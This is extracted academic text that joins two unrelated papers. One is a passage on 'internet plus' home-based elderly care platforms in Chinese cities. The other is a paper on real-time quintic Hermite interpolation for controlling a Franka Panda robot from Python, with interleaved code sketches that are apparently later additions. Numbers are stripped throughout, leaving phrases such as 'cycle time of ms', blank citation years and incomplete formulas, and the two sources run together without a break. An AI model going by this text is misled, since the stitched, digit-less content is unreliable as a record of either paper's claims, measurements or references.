existing community endowment service level of a single, poor professional, poor service quality problems. international conference on sensor network and computer engineering (icsnce ) table i. 
home-care social pension system in different city project name main service character ningbo jiangdong district "home integration" pension . construct a database (database) line ( service hotline) a machine (old machine) system (home integration information system) "information service model; . the virtual network and the entity network are mutual and mutual promotion to realize the integration of information network and service function. . the construction of the information system is comprehensive and the resources are used reasonably. . the information of the service for the aged and the service for the aged are interconnected, and the resources are effectively used. xiamen wisdom pension . pension information platform has set up a public service center for the aged. . opened the " " service special for the aged, and provided the hotline service for hours. . platform has developed smart watches, fall alarm, smart mattress and other intelligent devices, which can monitor the elderly's health in real time and alarm in time, providing good support for emergency rescue. . "platform" + "hotline" to build a three-dimensional old-age service information system. . the combination of online information and offline services to form a new model for the elderly. . use intelligent equipment to monitor the elderly in real time and provide effective emergency rescue for the elderly. health room in guangxi . government led, enterprises to host building healthy huts; . to establish the information database for the elderly and the dynamic electronic health files for the elderly, and provide the services of health management, living care and mental care. . build an information, intelligent call service and support center to establish a perfect health care system for the elderly. . "government + enterprise" operates the old-age information system to reduce the burden of the government's pension investment. . the use of information database for the elderly provides accurate information for the service of the aged. shanghai is an old service platform . (www.shweilao.cn shanghai integrated service platform for old age). it has three functions of "unified portal for old information service", "unified entrance of old age service industry management" and "old database of service resources". . integrate and link all kinds of old service information to facilitate the public browsing and inquiring the content and service information of the industry. . use the information system to implement dynamic management for the old service institutions and personnel, and strengthen the service and supervision of the industry. . comprehensive services for the old service platform to achieve a powerful, "one key service"; . the elderly are combined with management and supervision to achieve multiple services in management. qinhuangdao endowment service website . strengthen the construction of information, establish a public web site for the old-age service industry and the service website of each community pension center. . the page design and language of the web site are concise and clear and clear at a glance. . the information is released in time to facilitate the users to understand the service information quickly. . the web design is concise and convenient for the communit residents and the elderly to look up. international conference on sensor network and computer engineering (icsnce ) c. 
taking the needs of the elderly as the guidance to effectively meet the elderly's needs for the aged only with the needs of the elderly, can the participation rate of community residents be improved and the effective demand of community home care for the elderly can be met. because of the diversity, dynamicity and variability of the needs of the elderly, the demand for services varies from different health status, income level and so on. with home care information platform, the elderly can choose their own services on the platform to meet the personalized needs of the elderly, and also solve the current plan of home care services. iii. problems in “internet plus” home-based care services although the "internet plus" home-based care services in the community home endowment service has played an important role, but there are also some problems. a. lack of industry standards and effective supervision standard construction of our country at present the information in the community home-based care services is still lagging behind, the country has not yet formed a "internet plus" community home-based care services and the corresponding management norms and service standards, quality standards are not yet on the wisdom of the pension service industry entry and exit, intelligent community home care services, pension services and intelligent system to provide services organization evaluation explicit specification. it is precisely because of lack of industry standards that further leading to government supervision is not in place. it has not yet been scientifically evaluated objectively for the information platform itself and the organization providing pension services. b. over reliance on the government, the low degree of marketization at present, though the government tries to alleviate the problem of effective supply of pension services by buying services, entrusting business and public-private partnerships, the effect is not obvious, and the contradiction between supply and demand is still outstanding. although the existing pension information platform alleviates these contradictions to a certain extent, the phenomenon of relying on the government is still obvious because the current home care is still dominated by the government. in addition, under the background of the government led, market organization's participation in community home care services is not very active, resulting in inefficient use of the information platform, and the effectiveness has not yet been effectively implemented. c. incompatibility of pension information platform at present, the information platform of community home care service mainly adopts government departments as the center to issue government information, even though some platforms extend to the communities where the elderly live, but it is still difficult to achieve the downward shift of management focus. moreover, the information platform developed by each intelligent pension enterprise is not compatible with each other, and does not connect with the government's pension service information network platform. the information can not be shared, which affects the construction of the public information platform for the old-age service. iv. improve the countermeasures of home-based care services of the internet plus " a. 
strengthen the design of the top level of the government, to promote the cooperation of the departments and to establish the standard system of information standards the government plays an important role in the development of social service for the aged, as well as the planners, policymakers and supervisors. in the construction of "internet plus" community home-based care services system, the government should still play a key role. first, from the policy level to improve the relevant legislation, to provide policy support for the "internet plus" home-based care services. second, we should set up a unified standard system for the elderly service information as soon as possible, and speed up the research and formulation of the information standard of the old age service according to the actual needs, the formulation of standards, the sharing of information, the international conference on sensor network and computer engineering (icsnce ) sharing of resources, and the interactive use of information platforms. b. guide social organizations and companies to participate in the information construction of community home care service “internet plus” home-based care services is home-based care services activities carried out under the guidance of the government. it needs the active participation of social organizations and market forces, so that we can solve various problems faced by the elderly at home, and meet the needs of the elderly in the diversified pension system. to this end, the government should take government procurement, government enterprise cooperation and other ways to guide the social organizations and companies to participate in the construction of the service platform for the aged. at the same time, the introduction of preferential measures in taxation, land, construction, encourage and support social forces to invest in "internet plus" home-based care services platform. c. the applicability of improvement internet plus "old-age home information platform from the building “internet plus” home care information platform's efficiency, mainly is the basic information data of the elderly registration, collection and input, so as to establish the elderly database, the elderly mainly by phone or smart devices on the platform subscription service. this is just the initial stage of home care information, to obtain the considerable development, the construction must pay attention to the applicability of the platform, the integration of social resources, the life care services, health care and psychological comfort services connected through the network, the realization of “one button”, improve the quality of home-based care services. v. conclusions facing the pressure of population aging and the decline of family care function, it is no doubt that the cooperation between the government and the third party to provide pension services is a great measure to solve the pension problem. "internet plus" the use of information technology, the government, social organizations (enterprises), the elderly link, extension of home-based care services in time and space, help to promote the full coverage of social endowment service, solve the menace from the rear of the elderly. reference [ ] wang yong. intelligent pension service "decompression" -- an interview with the national office on aging inspector, hualing intelligent endowment industry development center director zhu yong [eb/ol].http://www.lepp.zju.edu.cn/show.aspx id= &cid= . - - .? 
submitted july accepted september published november corresponding author morten lind, morten.lind@sintef.no academic editor marcin woźniak additional information and declarations can be found on page doi . /peerj-cs. copyright lind distributed under creative commons cc-by . open access real-time quintic hermite interpolation for robot trajectory execution morten lind production technology, sintef manufacturing, trondheim, trøndelag, norway abstract this paper presents a real-time joint trajectory interpolation system for the purpose of frequency scaling the low cycle time of a robot controller, allowing a python application to control the robot in real time at a moderate cycle time. interpolation is based on piece-wise quintic hermite splines. the splines are calculated in real time, in a piece-wise manner between the high-level, long cycle time trajectory points, and are sampled at an appropriately shorter cycle time to satisfy the real-time requirement of the lower-level system. the principle is usable in general, and the specific implementation presented is for control of the panda robot from franka emika. a tracking delay analysis is presented based on a cosine trajectory. a simple test application has been implemented, demonstrating real-time feeding of a pre-calculated trajectory for cutting with a knife. estimated forces on the robot wrist are recorded during cutting and presented in the paper. subjects real-time and embedded systems, robotics keywords interpolation, robotics, real-time, python, joint control, trajectory introduction reacting instantaneously to perceived changes in the environment is an important feature of modern robotics, recently for safe human-robot cooperation, but also more traditionally for force-based control and visual servoing applications. the setup for this includes a sensor system for perceiving the environment, a control model for deciding how to react, and a control interface to the mechanical system. all of this must be integrated, in real time, into a sensor-based robot control application, and a real-time interface to the robot arm, through the robot controller, is a necessity. newer robot controllers are getting increasingly open towards real-time trajectory feeding.
an early example of a supported mechanism was realized in the kuka controllers with the robot sensor interface (rsi) software package, which used a cycle time of ms in version and ms in version ; version maintained the legacy ms cycle time as an option. results were presented by lind, schrimpf & ulleberg ( ). the universal robots controllers can be controlled in various, official ways through the standard controller process; methods and results are reported by andersen ( ). older versions of the universal robots controllers provided an unofficial c api, with very low tracking delay, as presented by lind, schrimpf & ulleberg ( ). more accurate methods for measuring and classifying types of delays were presented by andersen et al. ( ). besides standard interfaces to robot controllers, some controllers can be hacked to gain access at the lower controller levels. kröger & wahl ( ) directly accessed the frequency inverters of a stäubli rx controller and were able to perform servo-level control at khz. schrimpf ( ) injected a single-board computer into the usb link between the higher and lower level controller components of a nachi ax controller, enabling joint-level control at hz. developing sensor-based, real-time robot control applications is challenging, more so when the target programming platforms, in general, are exclusively available in compiled languages such as c++. for those situations where the real-time performance is not too critical, also called soft real-time requirements, development efficiency increases if a higher-level, general programming language, such as python, can serve as the target platform. the main motivation for the presented work is to enable such a high-level, general, soft real-time programming platform, in this case python, for developing advanced control applications; such as the deepmpc framework for cutting of food products described by lenz, knepper & saxena ( ) and the real-time grasping control described by morrison, leitner & corke ( ). from experiments and experience, a pure python-based framework, exploiting numpy for numerical calculations, manages to calculate kinematics for a typical industrial robot system with six to nine joints in ms, with room for also doing some sensor processing and general data accounting, using a contemporary pc (lind, tingelstad & schrimpf, ). this calculation time strongly depends on the amount of sensor processing and data accounting, and on the computing power of the cpu and computer system on which the software is deployed. on a modern, high-end pc of today the results presented by lind, tingelstad & schrimpf ( ) may well be possible with a ms cycle time. due to the ''global interpreter lock'' in the python interpreter, multi-threading in a single python process does not utilize the multiple cores of modern cpus, and computationally heavy applications should be distributed over several processes. eggen & eggen ( ) present experiments and results aimed at determining when it is advantageous to process-distribute a python application.
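as a minimal illustration of the point above about the global interpreter lock, the following sketch, which is not taken from the paper's code base and uses an arbitrary cpu-bound workload, contrasts a thread pool with a process pool for pure-python work; only the process pool can use several cores.

```python
# minimal sketch: cpu-bound pure-python work holds the gil, so threads give no
# speed-up, while a process pool distributes the work over several cores.
import time
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor

def busy(n: int) -> int:
    """cpu-bound pure-python work; holds the gil while it runs."""
    total = 0
    for i in range(n):
        total += i * i
    return total

def timed(executor_cls, workers: int, jobs: int, n: int) -> float:
    start = time.perf_counter()
    with executor_cls(max_workers=workers) as pool:
        list(pool.map(busy, [n] * jobs))
    return time.perf_counter() - start

if __name__ == "__main__":
    jobs, n = 8, 2_000_000
    print("threads  : %.2f s" % timed(ThreadPoolExecutor, 4, jobs, n))
    print("processes: %.2f s" % timed(ProcessPoolExecutor, 4, jobs, n))
```

note that numpy itself releases the gil in many heavy operations, which is part of why a numpy-based kinematics loop can stay within a moderate cycle time in a single process.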
schrimpf, lind & mathisen ( ) presented a time analysis for various data paths in a distributed, real-time, sensor-based robot application implemented and deployed with python and ros. the seven-axis panda robot from franka emika can be controlled in real-time through an ethernet udp connection. the real-time control interface requires a cycle time of ms. several other robot controllers provide real-time interfaces for trajectory feeding at rates higher than hz. mihelj et al. ( ) mentions official and research interfaces for real-time control through available controllers for kuka, stäubli, yaskawa motoman, and comau robots. these examples may indicate a slow but general tendency for such joint-level, low-latency interfaces to become of more general availability among robot controllers in the future. the cycle time requirement of ms of the franka controller, and even the ms interface to newer kuka controllers with rsi version , poses a computational and real-time challenge for python-based real-time trajectory feeding application. it is a computation time challenge, since pure python computations in general is slower than c++ code by an lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. order of magnitude or more. this, however, is mitigated somewhat when using efficient scientific computation packages such as numpy and scipy. it is a real-time challenge, since the wake-up latency on the pc gets an additional contribution through the python interpreter. this paper shortly sketches a prototype solution addressing these challenges by presenting a joint-level intermediary motion service over ethernet that respects the ms real-time obligation towards the franka controller, while providing an interface to the python motion application requiring a more moderate cycle time; e.g., ms. the motion service requires a cyclic real-time response from the motion application while obeying the similar requirement from the franka controller. this allows for the motion application to make instantaneous changes and correction to the generated trajectory it emits. a positive side effect of this motion service is that it is re-connectable, since it detects the disconnection from, or a failure to comply in, the python application, whereby it takes over the real-time obligation towards the franka controller; and thus the low-level control loop is maintained. the implementation of the presented solution is based on piece-wise quintic hermite splines with an option to limit velocity, acceleration and jerk. the current implementation was developed for being fed a position trajectory from the motion application. however, velocities and accelerations are derived over the position trajectory and used in the interpolation, and can also be fed from the motion application. the presented solution can be classified as type v in the scheme by kröger & wahl ( ). the choice of piece-wise hermite spline as the fundamental computational object for trajectory representation was made due to its adequate parameterization and domain: piece-wise hermite splines are parameterized by clamping the direct motion quantities, such as position, velocity, acceleration, and jerk, at the end-points of each segment. system and methods the minimal system that have been set up for experimentation and testing is based on the seven-axis panda robot from franka emika (https://franka.de/). 
an intermediate motion service performs the interpolation from a lower frequency loop to the required rate of the high frequency loop for positions, and optionally velocities and accelerations, for all joints. a motion application may then connect to the low-frequency interface of this motion service, and thus control the robot arm at a moderate real-time frequency. this section gives an overview of the active entities in the experiment system and of the hermite spline calculus. the panda robot and the franka controller at the lowest level the robot arm servos are controlled via a proprietary interface by the ''franka controller'' (fc). the ''franka control interface'' (https://frankaemika.github.io/docs/libfranka.html) (fci) is a software add-on for the fc which enables real-time trajectory feeding, synchronized with reading the state of the robot, including joint torques and estimated external forces. figure : interaction and sequence diagrams for the proposed system. (a) rough structure of processes and entities with their connections. (b) sequence diagram for the synchronization among the three threads in the ms, the fc and the ma. when the fci is installed on the fc, the freely available c++ library ''libfranka'' (https://github.com/frankaemika/libfranka) can be used to operate the robot arm at a cycle time of ms. the mechanism is to hand a callback function to libfranka when starting the control loop. this callback is then invoked every ms with the status of the robot arm, and is expected to return within less than one cycle. this cycle time is dubbed the micro cycle time. in the figure the fc is modelled as a process controlling the panda arm, running on the franka controller pc, i.e., it is born with its own node. the fci is exposed over an ethernet udp socket, on an ip address configured in the fc. thus the trajectory feeding is performed from a different node; e.g., a user-supplied pc. libfranka provides various methods of control, ranging from operational (cartesian) space control of the tool flange to joint torque control. this paper does not go into detail with libfranka, and the presented work only uses the joint position control mode. motion service and application for the purpose of obeying the micro cycle real-time requirement, the ''motion service'' (ms) has been developed and implemented. as illustrated in the figure, the ms links with libfranka for setting up the callback communicating with the fc over the fci, and for starting the control loop. the ms runs in its own process, on its own node, separate from the fc. the ''motion application'' (ma) process may run on the same computational node as the ms. for connection responsiveness, it is better to have the ms and the ma run on the same node; however, for dedicating more computing power to the ma, leaving more computational resources for sensor analysis and control algorithms, it could run on a dedicated node.
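to make the ma side of this arrangement concrete, the following hedged sketch shows a python motion application answering cyclic triggers from a motion service over udp. the wire format used here, a text trigger answered by seven little-endian doubles of joint positions, and the address and port are purely hypothetical; the actual protocol is defined by the motion service implementation and is not reproduced here.

```python
# hypothetical udp exchange from the motion-application side: wait for the macro
# cycle trigger from the motion service, then reply with the next joint setpoint.
import socket
import struct
import math

MS_ADDR = ("127.0.0.1", 20000)   # assumed address/port of the motion service
NUM_JOINTS = 7

def serve_macro_setpoints(home, duration_cycles=500):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(1.0)
    sock.sendto(b"connect", MS_ADDR)                 # hypothetical session start
    for k in range(duration_cycles):
        try:
            trigger, _ = sock.recvfrom(1024)         # ms announces a new macro cycle
        except socket.timeout:
            print("no trigger from motion service; stopping")
            break
        # next macro setpoint: a small cosine motion on one joint, for illustration
        q = list(home)
        q[3] += 0.05 * (1.0 - math.cos(2 * math.pi * k / 100.0))
        sock.sendto(struct.pack("<%dd" % NUM_JOINTS, *q), MS_ADDR)
    sock.close()

if __name__ == "__main__":
    serve_macro_setpoints(home=[0.0, -0.785, 0.0, -2.356, 0.0, 1.571, 0.785])
```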
the presented architecture, where the ms exposes its interface via an ethernet udp socket, is flexible with regard to where the ma runs. the figure also illustrates how an optional force-torque sensor may be added. such a force-torque sensor would typically be mechanically mounted between the wrist of the robot arm and the robot tool for measuring the wrench, w, on the tool. a force-torque sensor is not used in the presented setup and experiments; instead the estimated wrench, ŵ, from the robot dynamics is used. this estimate is obtained as a feature from libfranka and provided by the ms to the ma. software mechanisms for understanding the general workings of the ms, this section gives a brief overview of the central mechanistic design. the sequence diagram in the figure illustrates the central, operative synchronization and responsibility of the three threads of the ms code. in addition, the network-remote entities fc and ma are modelled as threads with remote message interaction to the ms threads. beyond this central, operative interaction, the connection thread in the ms has a complex logic for maintaining control of the connection from an ma; this will not be treated here. the connection management enables the fc-ms interaction to be kept alive over repeated ma-sessions, but the main focus of this paper is to describe the interpolation in the ms. also not illustrated in the figure are the setup and initialization procedures of the ms, which establish the real-time loop with the fc and prepare for receiving connections from an ma. like the connection maintenance, this is also important, but the details are not in the focus of this paper. a micro cycle is initiated by the callback from the fc to the responder thread in the ms, conveying the robot arm status. the responder thread is only responsible for conveying this trigger and status data to the updater thread, and for returning to the fc the prepared next micro setpoint obtained from the updater thread in response. upon receiving the new micro state and returning the next micro setpoint, the updater thread triggers itself to calculate the micro setpoint for the next micro cycle. when the updater thread is triggered to prepare the micro setpoint for the next micro cycle, it first updates its micro and macro cycle accounting, which determines whether a new macro cycle is to be started. the current macro cycle is valid for the next micro cycle if the current spline domain is valid for the time of the next micro cycle; in that case, the current spline is used to prepare the next micro setpoint. if a new macro cycle is to be started, the updater triggers the connection thread, and the next macro setpoint is retrieved from it. if a valid new macro pose is retrieved, a new spline based on this is set up and used for micro setpoint calculation. if not, due to a late response or a disconnect from the ma, a braking spline is generated. the severity of this braking spline depends on whether the missing macro setpoint was due to lateness or a broken connection. in the former case, only light braking is generated, since it is expected that the ma will resume its responsiveness. in the latter case full-deceleration braking is generated, since the robot arm must then come to a full stop as fast as possible. the connection thread is, during operation in an ma-session, responsible for the interaction with the ma.
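the following simplified and runnable sketch mirrors the updater decision just described: if the active segment still covers the time of the next micro setpoint it is simply sampled, otherwise a new macro segment is started from a fresh macro setpoint, and a braking (here: hold) segment is substituted when no setpoint is available. segments are linear here purely to keep the sketch short; the actual ms uses quintic hermite splines, and the cycle times are assumed values.

```python
# simplified updater logic: keep sampling the current segment while its domain covers
# the next micro time; otherwise start a new macro segment or fall back to braking.
MICRO, MACRO = 0.001, 0.010   # assumed micro and macro cycle times (s)

class Segment:
    def __init__(self, t0, p0, t1, p1):
        self.t0, self.p0, self.t1, self.p1 = t0, p0, t1, p1
    def covers(self, t):
        return self.t0 <= t <= self.t1
    def sample(self, t):
        u = (t - self.t0) / (self.t1 - self.t0)
        return self.p0 + u * (self.p1 - self.p0)

def run(macro_setpoints, n_micro):
    seg = Segment(0.0, macro_setpoints[0], MACRO, macro_setpoints[0])
    out, idx = [], 0
    for k in range(1, n_micro + 1):
        t = k * MICRO
        if not seg.covers(t):                      # macro cycle expired
            idx += 1
            if idx < len(macro_setpoints):         # fresh macro setpoint available
                seg = Segment(seg.t1, seg.p1, seg.t1 + MACRO, macro_setpoints[idx])
            else:                                  # late or disconnected: brake/hold
                seg = Segment(seg.t1, seg.p1, seg.t1 + MACRO, seg.p1)
        out.append(seg.sample(t))
    return out

if __name__ == "__main__":
    micro = run([0.0, 0.01, 0.03, 0.06], n_micro=60)
    print(len(micro), "micro setpoints, last =", round(micro[-1], 4))
```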
the connection thread is triggered by the updater thread when a new macro cycle is started, and it propagates this trigger on to the ma. after triggering the ma, it expects to receive a new macro setpoint some time later, before the end of the newly started macro cycle. when a macro setpoint is received from the ma, a flag is set to indicate that a new macro setpoint has arrived. this flag is checked by the updater thread and is used to determine whether the ma was within its deadline. the updater clears the flag, preparing it for the reception of the next macro setpoint from the ma. timing-wise, a received macro setpoint is stored one slot ahead of its immediate use; i.e., one extra macro setpoint in the stream is retained. this delay is introduced to be able to correctly estimate the acceleration at the setpoint being splined toward, using the central acceleration estimator over that setpoint and its two neighbours in the stream. the same principle is used for the velocity at that setpoint, which results in the average of the velocities on the two adjacent segments. the calculus of motion quantities at the macro trajectory points is based on the stream of joint positions received from the ma, which are assumed to arrive at regular times separated by the macro cycle time, $\delta t_{mac}$. this stream of macro joint position vectors, $\{p_i\}_i$, is the fundamental input data from the ma to the ms. over these, the central discrete estimators of velocity and acceleration at an interior setpoint $j$ may be concisely expressed as

$p^{(1)}_{j} = \tfrac{1}{2}\left[\frac{p_{j} - p_{j-1}}{\delta t_{mac}} + \frac{p_{j+1} - p_{j}}{\delta t_{mac}}\right]$

$p^{(2)}_{j} = \frac{p_{j+1} - 2\,p_{j} + p_{j-1}}{\delta t_{mac}^{2}}$

these estimated first and second derivatives of the macro joint trajectory are used for calculating the splines, which are then sampled to generate the micro trajectory positions. hermite splines hermite spline and hermite interpolation are named in honour of the 19th century french mathematician charles hermite. general treatments of multi-node hermite splines of arbitrary order may be found in several publications and textbooks; e.g., spitzbart ( ) focused on a general formulation for arbitrary order, while krogh ( ) focused on efficient computation of interpolation and numerical differentiation with continuous derivatives. however, the course notes by finn ( ) introduce an elegant formulation of the basis polynomials for cubic and quintic hermite interpolation. both have been implemented in the ms. the formalism can be concisely written, with the same enumeration of the basis functions, as

$\tilde{p}_n(u) = \sum_{i=0}^{(n-1)/2} \left( p^{(i)}_{0}\, H^{n}_{i}(u) + p^{(i)}_{1}\, H^{n}_{n-i}(u) \right) \quad \text{for } u \in [0;1]$

in this equation we assume an underlying trajectory $p(u)$ of which we know $p^{(i)}_{\tau} = p^{(i)}(\tau)$ for $i \in \{0,\dots,(n-1)/2\}$ and $\tau \in \{0,1\}$, where $p^{(i)}$ is the $i$'th derivative of $p$. the basis functions for hermite interpolation to order $n$ are denoted $\{H^{n}_{i}\}_{i \in \{0,\dots,n\}}$. for cubic ($n=3$) and quintic ($n=5$) hermite interpolation the basis functions can be found listed in finn ( ); for completeness, the coefficients of these basis polynomials can be written in matrix notation, following finn ( ). in an online or real-time system a change of variable is necessary for the equation above to be applicable. when the system at run-time establishes a new interpolation segment it takes the form $[t_0; t_1]$ with $\delta t_{mac} = t_1 - t_0$.
introducing the substitution $u(t) = \frac{t - t_0}{\delta t_{mac}}$ on the interval, and letting $p^{(i)}_{\tau} = p^{(i)}(\tau)$ for $i \in \{0,\dots,(n-1)/2\}$ and $\tau \in \{t_0, t_1\}$, the directly applicable version of the interpolation formula is

$\tilde{p}_n(t) = \sum_{i=0}^{(n-1)/2} (\delta t_{mac})^{i} \left( p^{(i)}_{t_0}\, H^{n}_{i}(u(t)) + p^{(i)}_{t_1}\, H^{n}_{n-i}(u(t)) \right) \quad \text{for } t \in [t_0; t_1]$

this equation has been implemented in the ms code base for both cubic and quintic hermite splines, and it can be used based on joint velocities and accelerations from the macroscopic trajectory which is fed from the ma. it is noteworthy that a piece-wise cubic hermite spline is a c1-smooth function and a piece-wise quintic hermite spline is a c2-smooth function. with respect to generating motion trajectories, the great difference between these is the jerk, the third derivative of the position trajectory. many motion controllers require being fed a limited-jerk trajectory, which is fulfilled by a c2-trajectory, whereas a c1-trajectory exhibits infinite jerk. experiments and results during development a cosine position trajectory generator has been used extensively. this section presents some results from such cosine trajectories. a cosine trajectory is used for testing since it starts at zero speed, is cyclic, and is infinitely smooth (c∞). in addition to the testing by a cosine position trajectory, preliminary experiments have been performed using the force-torque estimation from the fc with a python-based framework, aimed at integrating force-feedback in a knife-cutting application. the cutting experiment does not utilize the real-time possibility of the motion service, but only serves to demonstrate its soundness from a simple application perspective. cosine joint motion a simple cosine motion is generated and the motion of a single joint is observed. this first and foremost gives insight into the tracking delay in the system. the presented results define the tracking delay, seen from the ms, as the time passed from receiving a macro setpoint from the ma until a status packet from the fc shows that the joint position has been achieved. the figure shows a selected time range for the position trajectory of the moving joint. the time range has been selected to make it easy to inspect the delays from the ma over the ''franka ms'' (fms) and on to the report back from the fc. the observed delay between the ma and the fms is approximately ms, and the delay from the fms to the reported fc position is approximately another ms. in total, for the trajectory execution we can estimate a ms delay. it is evident that there is an inherent tracking delay of approximately ms in the fc. this is affected by various filters and compliance parameters which are set at the initialization of the control loop through the fci. thus a lower inherent tracking delay may be possible with tighter control parameters. in particular, the experiments presented here have been using a value of . hz for the parameter cutoff_frequency in libfranka. this parameter controls, according to the documentation of libfranka, a first order low-pass filter. the reason for choosing a low cutoff frequency is observable as a ''blackout'' of two to three micro cycles near t = . s in the figure. such blackouts occur roughly every second, but not regularly.
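as a brief aside, the interpolation calculus and the cosine test described above can be made concrete in a short self-contained sketch. the quintic basis polynomials below are one standard c2 quintic hermite basis matching the enumeration used in the text, and the cycle times and the cosine test signal are illustrative assumptions, not the values or the code of the paper.

```python
# hedged sketch: macro setpoints arriving every dt_mac get velocities/accelerations
# from the central-difference estimators, and one macro segment is then sampled at
# the micro cycle time with a quintic hermite polynomial.
import numpy as np

DT_MAC, DT_MIC = 0.010, 0.001   # assumed macro and micro cycle times (s)

def estimate_derivatives(p, dt):
    """central estimators at interior setpoints: mean segment velocity and
    second-order central acceleration; results align with p[1:-1]."""
    v = (p[2:] - p[:-2]) / (2.0 * dt)
    a = (p[2:] - 2.0 * p[1:-1] + p[:-2]) / dt**2
    return v, a

def quintic_hermite(u, p0, v0, a0, p1, v1, a1, h):
    """evaluate the quintic hermite interpolant on one segment, u in [0, 1]."""
    H0 = 1 - 10*u**3 + 15*u**4 - 6*u**5
    H1 = u - 6*u**3 + 8*u**4 - 3*u**5
    H2 = 0.5*u**2 - 1.5*u**3 + 1.5*u**4 - 0.5*u**5
    H3 = 0.5*u**3 - u**4 + 0.5*u**5
    H4 = -4*u**3 + 7*u**4 - 3*u**5
    H5 = 10*u**3 - 15*u**4 + 6*u**5
    return (p0*H0 + h*v0*H1 + h**2*a0*H2) + (h**2*a1*H3 + h*v1*H4 + p1*H5)

if __name__ == "__main__":
    # cosine macro trajectory for one joint: starts at zero speed and is c-infinity
    t_mac = np.arange(0.0, 1.0, DT_MAC)
    p_mac = 0.5 * (1.0 - np.cos(2 * np.pi * t_mac))
    v_mac, a_mac = estimate_derivatives(p_mac, DT_MAC)
    j = 10                                      # sample the segment [t_mac[j], t_mac[j+1]]
    u = np.arange(0.0, 1.0, DT_MIC / DT_MAC)
    p_mic = quintic_hermite(u, p_mac[j], v_mac[j-1], a_mac[j-1],
                            p_mac[j+1], v_mac[j], a_mac[j], DT_MAC)
    ref = 0.5 * (1 - np.cos(2 * np.pi * (t_mac[j] + u * DT_MAC)))
    print("micro samples on one macro segment:", len(p_mic))
    print("max deviation from the underlying cosine: %.2e" % np.max(np.abs(p_mic - ref)))
```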
the reason for these blackouts have not been clarified, but they probably arise from running the system on a full desktop pc; i.e., there have been no stripping of services or other running processes on the pc to increase the real-time responsiveness. execution of a simple cosine motion in one joint also allows the observation of the difference between using cubic and quintic hermite splines. to this end, classes have been implemented in the fms code base for both of these. figure shows accelerations obtained by discrete derivation of the ma and fms trajectories for the observed joint. figure a shows the acceleration in a trajectory in a session where the fms runs with cubic hermite interpolation and fig. b shows the same type of cosine trajectory from a session using quintic hermite interpolation. the cubic hermite interpolation acceleration curve in fig. a is clearly discontinuous, which is consistent with its c -property. correspondingly the quintic hermite interpolation acceleration curve in fig. b is clearly continuous, which is consistent with its c -property. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a selected time range of the positions in a cosine trajectory. image credit: morten lind, . full-size doi: . /peerjcs. /fig- figure comparison of accelerations in the generated trajectories from a cosine motion using cubic and quintic hermite interpolation. (a) acceleration for cubic interpolation. image credit: morten lind, . (b) acceleration for quintic interpolation. image credit: morten lind, . full-size doi: . /peerjcs. /fig- simple cutting a simple application for a cutting experiment has been set up. this is an application where the robot tool is a knife and the task is to cut through a presented object. by simple cutting is meant moving the tool according to a pre-calculated trajectory; in contrast to sensor-based adaptive cutting where sensor input is used in the motion generation loop. the application in this experiment does not exploit the ability to make real-time generation of, or corrections to, the commanded trajectory. the purpose of the experiment is to do a simple demonstration of the robustness of the ms implementation and to get an indication of the reliability and stability of the wrist wrench estimation obtained from libfranka. the minimalistic setup used in the experiment is illustrated in fig. . figure a shows a photo of the knife held in the robot gripper and a test object; in this case a stick of eps strapped to a bracket. figure b illustrates the geometric setup of the knife. the knife shaft is held clamped in the gripper, and thus defines the commanded knife directions for cutting ĉc, which is perpendicular to the edge, and shearing ŝc, which is parallel to the edge. the actual cutting and shearing directions are defined by the knife edge at the point of interaction. these are illustrated as ĉa and ŝa, respectively. interpretation of the data for the recorded forces in a lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the setup of the knife and object. the cutting and shearing directions used for commanding the motion is aligned with the knife, whereas the actual cutting and shearing directions depend on the an- gle of the knife blade in the region of interaction.(a) photo of the setup of robot, knife, and object. photo credit: morten lind, . 
(b) illustration of controlled and actual cutting and shearing directions. image credit: morten lind, . full-size doi: . /peerjcs. /fig- figure position and force recording sampled through a cutting process. image credit: morten lind, . (a) commanded trajectory of the knife along the ĉc and ŝc directions. image credit: morten lind, . (b) forces acting on the knife along the ĉc and ŝc directions. image credit: morten lind, . full-size doi: . /peerjcs. /fig- cutting experiment is deeply dependent of the recognition of the relation between these commanded and actual directions. a cutting experiment is executed by moving the knife in a cyclic series of strokes, forward strokes in the positive ŝc direction and backward strokes in the negative ŝc direction, while progressing steadily in the positive ĉc direction. the motion of the knife happens thus in a plane spanned by the ĉc and ŝc. the commanded position trajectory is shown in fig. a. the origin of the positions is where the knife is held at the start of the cutting process. the corresponding forces on the knife along the ĉc and ŝc directions, based on the estimated wrench obtained from libfranka in the fms, is seen in fig. b. in an ideal experiment one would expect a constant, negative cutting force in the ĉc direction and a square wave shearing force, symmetric around zero, in the ŝc direction. both of these would be smoothly modulated in size by the initially increasing, and later decreasing, interaction of the knife with the object as it passes through it. there are a couple of deviations from this ideal, qualitative behaviour. most noteworthy is the non-smoothness of the direct cutting force. next is the asymmetry around zero of the shear force. both of these are easily understood by the illustration of the actual cutting and shearing directions observed in fig. b. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discussion the current major challenge regards the blackouts in the communication between ma, fms, and fci. for a reliable and stable system, this must be addressed by real-time hardening of the computing environment on which the application runs. however, this is fairly unrelated to the soundness of the presented approach and reference implementation. particularly for knife-cutting applications, the discussion about a negative bias on the cutting and shearing forces, observed in fig. b, due to the deviation from the commanded directions, is interesting for future development. it shows that an edge-object-interaction observer should be developed, which will certainly be important for correct execution of the cutting process. the presented implementation will be used for future experiments in two directions involving real-time force feedback to the trajectory generation. firstly in the direction of explicitly modelling the cutting process, based on such work as that of reyssat et al. ( ). secondly, on the more implicit learning approach to cutting presented by lenz, knepper & saxena ( ). another application area, for which the presented implementation is intended, is that of grasping of unknown or variable objects. the vision-based servo control involved with ‘‘closed-loop grasping’’ is executing at a fairly low frequency; in the order of hz according to morrison, leitner & corke ( ). 
